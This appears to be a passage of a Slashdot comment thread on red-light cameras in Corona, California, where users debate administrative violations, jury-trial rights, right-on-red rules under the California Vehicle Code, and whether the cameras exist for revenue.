      "I disapprove of what you say, but I will defend to the death your right to say it." - historian Evelyn Beatrice Hall
  43. Re:prefilled comments by dgatwood · · Score: 4, Interesting

    On the subject of red light cameras, if they become administrative violations, IMHO, the right solution is to simply not pay them. The DMV almost certainly won't refuse to renew your license for such administrative violations because the law only allows parking violations and a few other things to be handled in that manner.. As such, the tickets probably have no teeth unless you do other business with the city and they have laws that would allow them to refuse to do other business with you until you pay the fees.

    --

    Check out my sci-fi/humor trilogy at PatriotsBooks.

  44. Constitutional? by PPH · · Score: 3, Informative

    "The problem here is that Corona is shredding the Sixth Amendment of the US Constitution, the right to a trial by jury. By reclassifying a moving violation... to an administrative violation... Corona is doing something really nefarious. In order to appeal an administrative citation you have to admit guilt, pay the full fine, and then apply for a hearing in front of an administrative official, not a judge in a court. T

    Could someone send a copy of the applicable amendments and supporting court decisions to Washington State? Moving violations have been considered "administrative violations" here for years. WA state does things a little differently; they don't require you to admit guilt. Guilt has nothing to to with paying/not paying a fine. They also employ someone who is nominally a judge to handle contested violations. But at the outset of the "trial" they state that it is not a trail, rules of evidence do not apply including the municipalities need to prove a case. Other than the semantics, it sounds just like Corona's system.

    --
    Have gnu, will travel.
    1. Re:Constitutional? by DerekLyons · · Score: 3, Interesting

      Could someone send a copy of the applicable amendments and supporting court decisions to Washington State?

      No, they can't - because they don't exist. I don't know of anywhere in the country where traffic violations (that is, those that don't count as misdemeanors or other criminal violations) are treated as criminal violations - which do require a trial by jury. IOW, the OP is just making shit up.

  45. Re:Avoid revenue camera intersections by TheCarp · · Score: 2, Interesting

    A better question is: Is not having to choose between getting a ticket or slamming on your breaks at a newly shortened yellow light cycle and being rear-ended really that important to you?

    Or how about Is it really so important to you that the city/state (and by extension, insurance companies) raise more money that you are willing to take measures that have been shown to INCREASE the number of traffic accidents? Is it really worth it to burden people with hundreds and hundreds of dollars worth of tickets for maneuvers like "california stops" that have been shown to not actually impact safety?

    Those seem like far better questions.

    -Steve

    --
    "I opened my eyes, and everything went dark again"
  46. Re:"Green Arrow". by Anonymous Coward · · Score: 2, Informative

    1. Right turn on red is not a yield in the US. The driver must come to a full stop before turning red, whereas for a yield the full stop is not necessary.

    2. The "california stop" mentioned in the original article is also called a rolling stop and is where the driver replaces stop and then go behavior with the yield and then go behavior of coasting to a low speed before going through the intersection. This is technically running the red light since the driver didn't stop before deciding it was safe to go and turning right.

    3. More obscure, but at least in California it's ok to do a right on red if a) it's not probited by a sign at the intersection, and b) you're either in the right most lane or all lanes further right are right turn only. So it's possible to do a right-on-red from lanes other than the right-most lane legally.

    4. Also obscure, but in California if there's an island separating the forward lanes from the right turn lanes, then the red light for the straight ahead lanes does not require a stop for the right turn lane, unless there's a separate stop light on the right turn lane. In this case the right turn lane often has a Yield sign though it's still o.k. to yield in this case even when the straight lanes have a red light. There are cases where this law is not understood even by police and by the folks who administer driving tests, so use this one at your own peril.

    Captcha is "pothole"

  47. Re:"Green Arrow". by Change · · Score: 3, Informative

    In California, home of the rolling stop, we also have many double right turn lanes at the end of freeway offramps, where the the two rightmost lanes are for right turns. Californians have come to behave (erroneously) as if a right on red is legal from either lane. Rather than educate the drivers, cities have begun installing NO RIGHT ON RED signage at these intersections.

    Where is such a turn prohibited in the vehicle code?

    21453(b): Except when a sign is in place prohibiting a turn, a driver, after stopping as required by subdivision (a), facing a steady circular red signal, may turn right, or turn left from a one-way street onto a one-way street. A driver making that turn shall yield the right-of-way to pedestrians lawfully within an adjacent crosswalk and to any vehicle that has approached or is approaching so closely as to constitute an immediate hazard to the driver, and shall continue to yield the right-of-way to that vehicle until the driver can proceed with reasonable safety.

    22100(a)(3): Upon a highway having an additional lane or lanes marked for a right turn by appropriate signs or markings, the driver of a vehicle may turn right from any lane designated and marked for that turning movement.

    You come to the light at either of the right-turn lanes, you stop, and if it is safe to do so you may make a right turn.

  48. Re:California Stops? by xav_jones · · Score: 2, Insightful

    The overuse of stop signs in southern California is unbelievable. Even on streets that one would naturally expect to flow through there are many 3- and 4-way stops. Having grown up with Australian traffic infrastructure and driven extensively in Europe the multitude of unnecessary stops in California is maddening -- not to mention environmentally unfriendly and inefficient. It may be ego but by sheer numbers of rolling stops being done here the title is not undeserved.

  49. Barrelfishes evading red-light cameras by Durindana · · Score: 2, Informative

    Well, that's odd.

    But anyway, concerning Corona, CA, it should be noted that some blogger linked to by TechDirt is no better a legal scholar than... anyone else, apparently. There's no Sixth Amendment right to a jury trial to "shred" for traffic violations, or any misdemeanor involving less than six months or so of jail.

  50. They keep trying this.. by NotOverHere · · Score: 2, Interesting

    TFS notes that the politicians seem more annoyed that they are being cut out of the money, not how it affects the citizens.

    They tried this in Springfield MO (sorry pay access to the local paper I read daily) http://pqasb.pqarchiver.com/news_leader/access/1691011761.html?FMT=ABS&date=Jan+13,+2009

    They don't even have to prove that you were driving to be ticketed, just the owner is ticketed... So there goes old fashion habeas corpus out the door. There is no reasonable means of redress if there is any issue, since it is just an administrational issue, not a criminal one. They also claimed that it was for "safety", except that they put them on the intersections with the most traffic, not the most accidents per intersection, or accidents per unit of traffic.

    If you could contest it like any other ticket in court, then it might stop being an illegal attack of a government on it's citizens.

  51. Re:prefilled comments by cayenne8 · · Score: 3, Interesting
    "On the subject of red light cameras, if they become administrative violations, IMHO, the right solution is to simply not pay them. The DMV almost certainly won't refuse to renew your license for such administrative violations because the law only allows parking violations and a few other things to be handled in that manner.. As such, the tickets probably have no teeth unless you do other business with the city and they have laws that would allow them to refuse to do other business with you until you pay the fees."

    That is how they are trying to get away with the red light cams in the New Orleans/Metairie area..the administrative approach.

    I had heard one person recently, had done what you suggested, and did not pay...and is suing to get out of them.

    I need to check back in on this, but, last I heard, there was a lawsuit to have the cameras removed as being (state) unconstitutional, in that every traffic law is supposed to be enforced equally, and since they don't have these cameras on EVERY redlight in the state...they are illegal to have in the few they do have.

    --
    Light travels faster than sound. This is why some people appear bright until you hear them speak.........
  52. Re:"Green Arrow". by tygt · · Score: 2, Informative

    "Turn-on-red", as far as I know, does not require you to yield (ie, slow, and stop only if there's opposing traffic of higher priority), but to actually stop first, and proceed with the turn only if it's safe to do so.

  53. All about REVENUE by Nonillion · · Score: 2, Insightful

    "where officials are considering ignoring a California law that authorizes red-light cameras -- cutting the state and the county out of their portion of the take -- in order to increase the city's revenue."

    If this doesn't convince you that it's NOT "all about safety" then I don't know what will...

    --
    "I bow to no man" - Riddick